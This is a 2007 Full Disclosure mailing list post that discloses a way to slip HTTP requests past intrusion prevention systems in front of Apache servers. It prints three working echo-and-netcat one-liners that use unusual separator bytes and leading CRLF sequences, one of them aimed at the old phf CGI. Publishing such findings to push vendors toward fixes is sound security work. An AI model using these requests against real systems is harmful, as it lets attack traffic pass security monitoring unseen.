Full Disclosure mailing list archives
IPS Evasion with the Apache HTTP Server
From: H D Moore <fdlist () digitaloffense net>
Date: Tue, 19 Jun 2007 14:20:41 -0500
Summarized from https://strikecenter.bpointsys.com/ Many commercial IPS products fail to decode HTTP requests which use 0x0c, 0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in the following format will evade most IPS protocol decoders: $ echo -ne "GET\x0c/cgi-bin/phf\x0cHTTP/1.0\r\n\r\n" | \ nc webserver 80 A request which contains multiple CRLF sequences instead of a valid method is processed by Apache, yet ignored by most IPS engines: $ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \ nc webserver 80 The first issue was covered more than a year ago, yet most IPS vendors have failed to address it. The second issue is new, as far as I know. You can even combine them: $ echo -ne "\r\n\r\n\r\n\r\n\r\n\x0c/buggy.php\x0bHTTP/1.0\r\n\r\n" | \ nc webserver 80 -HD _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- IPS Evasion with the Apache HTTP Server H D Moore (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server coderman (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server Valdis . Kletnieks (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server coderman (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server Valdis . Kletnieks (Jun 19)
- Re: IPS Evasion with the Apache HTTP Server 3APA3A (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server Jamie Riden (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server 3APA3A (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server H D Moore (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server H D Moore (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server Jamie Riden (Jun 20)
- Re: IPS Evasion with the Apache HTTP Server coderman (Jun 19)